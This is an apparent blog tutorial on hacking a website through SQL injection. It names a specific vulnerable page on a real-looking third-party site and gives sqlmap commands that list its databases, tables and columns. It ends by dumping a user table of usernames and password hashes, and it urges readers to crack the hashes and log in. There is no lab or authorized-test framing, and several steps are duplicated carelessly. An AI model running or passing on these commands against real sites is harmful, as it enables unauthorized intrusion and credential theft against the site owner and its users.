So What are we waiting for ? Lets Begin ...
Step 1 :
======
Find A Sql injectable website to hacking...
Simply put (') after the site and if u got any syntex error so the site is vulnerable...
I found a site to give u an example of the tool very clearly...
http://www.areyoureadytoorder.co.uk/review.php?id=280'
The site is vulnerable so let's hack it...
Step 2 :
======
In this tutorial i will use windows so put this command in cmd...
Start Sqlmap and type this command into it....
I made a directory in the python folder named as sqlmap so this is....
+++++++++
command 1:
+++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --dbs
here -u = means the link of your sql injectable webste....
--dbs = means tell the programme that dump the database...
Step 3 :
=====
So after Getting the Database name to dump the tables type this command on the box...
++++++++
command 2 :
command 2 :
++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --tables -D aytro
Now you wanna the columns that database have so let's go to dump the columns.....
+++++++++
command 3 :
+++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user
So now you have tables and columns of the website database....now the time to dump the username and password from the website....
Put the command to get the username and password....
+++++++++
command 4 :
+++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump
SO HERE IS THE USERNAME AND PASSCODES TO ACCESS BUT THE PASS IN HASH U NEED TO CRACK THEM SO AFTER THAT U GONE A ACCESS ON THE SITE,,,
HOPE U GUYS ENJOY THE TUTORIAL...
Step 4 :
=====
Now you wanna the columns that database have so let's go to dump the columns.....
+++++++++
command 3 :
+++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user
Step 5 :
=====
So now you have tables and columns of the website database....now the time to dump the username and password from the website....
Put the command to get the username and password....
+++++++++
command 4 :
+++++++++
python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump
HOPE U GUYS ENJOY THE TUTORIAL...
0 comments:
Post a Comment